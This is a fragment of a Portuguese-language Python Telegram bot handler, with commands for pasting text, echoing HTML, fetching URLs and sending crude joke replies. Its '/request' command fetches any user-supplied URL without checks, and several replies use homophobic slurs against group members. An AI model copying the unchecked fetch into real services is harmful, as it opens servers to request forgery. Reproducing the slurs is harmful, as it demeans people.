elif msg['text'].startswith('/hastebin') or msg['text'].startswith('!hastebin') or msg['text'] == '/hastebin@' + bot_username or msg['text'] == 'hastebin' or msg['text'] == 'pastebin':
print('Usuario {} solicitou /hastebin'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /hastebin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][9:] or msg.get('reply_to_message', {}).get('text')
if not text:
await bot.sendMessage(msg['chat']['id'],
'''*Uso:* `/hastebin <texto>` - _envia um texto para o hastebin._''',
'markdown',
reply_to_message_id=msg['message_id'])
else:
link = await send_to_hastebin(text)
await bot.sendMessage(msg['chat']['id'], link, disable_web_page_preview=True,
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/html') or msg['text'].startswith('!html') or msg['text'] == '/html@' + bot_username or msg['text'] == 'html':
print('Usuario {} solicitou /html'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /html --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'html',
reply_to_message_id=reply_id)
return True
elif msg['text'] == 'ban' or msg['text'] == '/ban' or msg['text'] == '/gorpo@' + bot_username:
print('Usuario {} solicitou ban'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou ban --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
try:
await bot.unbanChatMember(msg['chat']['id'], msg['from']['id'])
except TelegramError:
await bot.sendMessage(msg['chat']['id'],
'Nao deu pra te remover, voce.... deve ser um admin ou eu nao sou admin nesta bosta.',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/request') or msg['text'].startswith('!request') or msg['text'] == '/request@' + bot_username or msg['text'] == 'request':
if re.match(r'^(https?)://', msg['text'][9:]):
text = msg['text'][9:]
else:
text = 'http://' + msg['text'][9:]
try:
async with aiohttp.ClientSession() as session:
r = await session.get(text)
except Exception as e:
return await bot.sendMessage(msg['chat']['id'], str(e),
reply_to_message_id=msg['message_id'])
headers = '<b>Status-Code:</b> <code>{}</code>\n'.format(str(r.status))
headers += '\n'.join('<b>{}:</b> <code>{}</code>'.format(x, html.escape(r.headers[x])) for x in r.headers)
rtext = await r.text()
if len(rtext) > 3000:
content = await r.read()
res = await send_to_dogbin(content)
else:
res = '<code>' + html.escape(rtext) + '</code>'
await bot.sendMessage(msg['chat']['id'], '<b>Headers:</b>\n{}\n\n<b>Conteudo:</b>\n{}'.format(headers, res),
'html', reply_to_message_id=msg['message_id'])
return True
elif msg['text'] == 'suco':
if msg['from']['id'] in sudoers:
is_sudo = 'é gostozinho'
else:
is_sudo = 'tem gosto de bosta'
await bot.sendMessage(msg['chat']['id'], is_sudo + '?',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].lower() == 'rt' and msg.get('reply_to_message'):
print('Usuario {} solicitou rt'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou rt --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == '/rt@' + bot_username or msg['text'] == 'rtt':
if not re.match('🔃 .* foi gado pra caralho do filho da puta do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''🔃 <b>{}</b> foi gado pra caralho concordando com o -->
👤 <b>{}</b>: <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
#---------------------------------------------------------------------------------------------------------------
elif msg['text'].lower() == 'gay' and msg.get('reply_to_message'):
print('Usuario {} solicitou gay'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou gay --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* chamou de gay e pode sofrer processo do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} pode tomar um processo pois foi estupido para caralho xingando {} de gay, este viado e bicha loca do caralho só porque ele disse</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
#---------------------------------------------------------------------------------------------------------------
elif msg['text'].lower() == 'pau no cu' or msg['text'].lower() == 'pnc'and msg.get('reply_to_message'):
print('Usuario {} solicitou pau no cu(rt)'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou pau no cu(rt) --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* chamou de pau no cu e pode sofrer processo do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} xingou e nao deixou baixo para {}, eu nao deixava e cagava o filho da puta na porrada so porque ele disse</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].lower() == 'filho da puta' or msg['text'].lower() == 'pnc'and msg.get('reply_to_message'):
print('Usuario {} solicitou filho da puta(rt)'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou filho da puta(rt) --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* xingou a mãe do \n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} xingou a mãe do {}, poxa o cara só falou</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
| 57.831288 | 302 | 0.481038 | 2,074 | 18,853 | 4.24783 | 0.12054 | 0.050057 | 0.092168 | 0.059932 | 0.74756 | 0.707037 | 0.68025 | 0.635528 | 0.572077 | 0.528604 | 0 | 0.001357 | 0.335596 | 18,853 | 326 | 303 | 57.831288 | 0.701182 | 0.016655 | 0 | 0.559441 | 0 | 0.017483 | 0.298202 | 0.008797 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.031469 | 0 | 0.094406 | 0.048951 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.